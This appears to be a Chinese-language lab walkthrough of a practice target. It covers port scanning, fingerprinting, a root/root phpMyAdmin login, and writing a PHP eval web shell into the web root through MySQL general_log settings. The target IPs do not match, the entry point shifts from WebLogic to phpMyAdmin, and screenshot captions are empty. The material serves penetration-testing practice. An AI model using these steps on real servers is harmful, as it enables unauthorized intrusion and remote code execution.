内网靶场-1

1 靶场信息

1	目标ip：192.168.211.129

2 渗透路径

2.1 信息收集

ip端口探测

.\mx1014.exe -t 100 -T 500 10.10.0.102
# 2025/02/17 20:25:04 Start scanning 1 hosts... (reqs: 346)

10.10.0.102:80             (in,iis,rce,jboss,web2,web1)
10.10.0.102:445            (brute,win,in,rce,smb)
10.10.0.102:3389           (rdp,brute,win,in)
10.10.0.102:135            (win,in,msrpc,info)
10.10.0.102:139            (brute,win,netbios,in,rce,info,smb)
10.10.0.102:7001           (in,web2,weblogic)

# 2025/02/17 20:25:06 Finished 346 tasks.
# up: 100% (1/1), discard: 0, open: 6, pps: 170, time: 2s

端口扫描发现7001端口，web服务，标记是weblogic服务。finger -mdir参数主动尝试识别指纹，除了weblogic，未发现其他特征信息。
ffuf目录探测，发现weblogic后台路径，因已weblogic为入口点。

‌‌‌‌　　finger指纹识别，发现phpmyadmin后台。

1	.\finger.exe -u http://192.168.211.129/ -mdir

示：

示：指纹识别

2.2 弱口令登录

‌‌‌‌
‌‌‌‌　　弱口令root / root 直接登录phpmyadmin后台，获取网站数据库权限。当前用户root权限，ALL PRIVILEGES，拥有写入权限。

1	SHOW GRANTS FOR CURRENT_USER();

示：

2.3 绝对路径获取

尝试根据一些文件安装路径猜测网站路径

1 2	SELECT @@basedir //查看mysql安装路径 select @@general_log_file; //查看日志存储安装路径

目标已经提供phpinfo探针记录。直接获取到网站绝对路径.

2.4 log日志写入文件

set global general_log= 'ON';
set global general_log_file='C:\\phpStudy\\WWW\\cris.php';
select '<?php @eval($_POST["x"])?>';
set global general_log= 'OFF';